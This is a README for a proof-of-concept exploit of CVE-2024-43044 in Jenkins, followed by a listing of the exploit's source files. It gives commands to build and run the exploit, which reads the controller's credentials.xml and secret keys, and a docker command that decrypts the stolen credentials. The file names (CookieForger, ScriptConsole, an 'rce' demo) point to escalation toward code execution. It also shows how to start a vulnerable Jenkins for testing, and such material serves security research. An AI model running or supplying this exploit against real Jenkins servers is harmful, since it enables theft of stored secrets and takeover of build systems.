## Intro
This is an exploit for CVE-2024-43044, an arbitrary file read that allows an agent to fetch files from the controller.
The exploit will use the vulnerability to read credentials.xml file and get secret keys to decrypt it.
Initial code : https://github.com/convisolabs/CVE-2024-43044-jenkins
Original writeup : https://blog.convisoappsec.com/en/analysis-of-cve-2024-43044/
## Building the exploit
```sh
mvn package
```
## Running the exploit
```sh
java -jar exploit.jar mode_secret <jenkinsUrl> <nodeName> <nodeSecretKey>
```
### Decrypt credentials.xml
```sh
docker run \
--rm \
--network none \
--workdir / \
--mount "type=bind,src=$PWD/master.key,dst=/master.key" \
--mount "type=bind,src=$PWD/hudson.util.Secret,dst=/hudson.util.Secret" \
--mount "type=bind,src=$PWD/credentials.xml,dst=/credentials.xml" \
docker.io/hoto/jenkins-credentials-decryptor:latest \
/jenkins-credentials-decryptor \
-m master.key \
-s hudson.util.Secret \
-c credentials.xml \
-o json
```
## Testing
You can test it in vulnerable version using docker:
```sh
docker run -p 8080:8080 -p 50000:50000 --restart=on-failure jenkins/jenkins:2.441-jdk17
```
Once you have a jenkins runnning, setup an agent.
[4.0K] /data/pocs/f743f38a3b1bef93d94a98fb69cf4dd8014718dd
├── [4.0K] assets
│ └── [2.9M] rce_mode_secret.gif
├── [3.2K] pom.xml
├── [1.2K] README.md
└── [4.0K] src
└── [4.0K] main
└── [4.0K] java
└── [4.0K] poc
├── [6.6K] CookieForger.java
├── [4.1K] FakeCookieForger.java
├── [5.6K] Main.java
├── [8.3K] PocListener.java
├── [1.2K] RemoteFileReader.java
├── [6.3K] ScriptConsole.java
├── [5.2K] SystemUtils.java
├── [ 516] UserInfo.java
└── [4.3K] UserParser.java
5 directories, 12 files